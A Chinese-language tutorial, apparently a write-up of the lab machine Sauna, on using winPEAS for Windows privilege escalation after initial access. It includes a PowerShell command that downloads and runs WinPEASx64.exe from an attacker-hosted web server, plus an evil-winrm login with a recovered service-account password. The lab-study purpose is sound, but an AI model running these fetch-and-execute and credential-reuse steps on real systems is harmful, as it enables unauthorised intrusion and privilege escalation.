當滲透測試者或是駭客獲得初步的存取權時,當前使用者可能非root,如果要進一步提權時,可以使用winpeas輔助使用,尋找可能存在的弱點。使用的前提就是目標主機的作業系統為windows,且已經獲得初步的存取權,能夠上傳winpeas.exe至被害主機。
winpeas使用我將以靶機Sauna說明,目前已經取得使用者fsmith的密碼,並利用evil-winrm
登入進受害主機。接著我們先用python在本地開啟網頁伺服器,讓我們能夠在目標主機下載winpeas.exe。
## python3版本
python3 -m http.server 8080
## python2版本
python -m SimpleHTTPServer
下一步就是在目標主機裡輸入指令,下載我們的winpeas.exe。
powershell Invoke-WebRequest -Uri http://[attacke ip]:8080/WinPEASx64.exe -OutFile winpeas.exe
.\winpeas.exe
在此我們利用powershell下載發起一個網頁請求,-Uri
指定下載檔案的位置,-OutFile
為設定在目標主機儲存的檔名。
Winpeas.exe會揭露主機的基本資訊,從結果我們可以知道主機名稱為SAUNA,使用者為FSmith。
winpeas也會檢查是否有可登入的帳號密碼,在這找到了使用者svc_loanmanager的密碼,但利用evil-winrm登入後發現錯誤。於是,我們在目標主機裡輸入net user
確認使用者有哪些。
使者明稱為svc_loanmgr,而非svc_loanmanager,讓我們再次登入。
evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
最後登入成功
接著就能做後續的動作。
今天的介紹到此結束,謝謝:)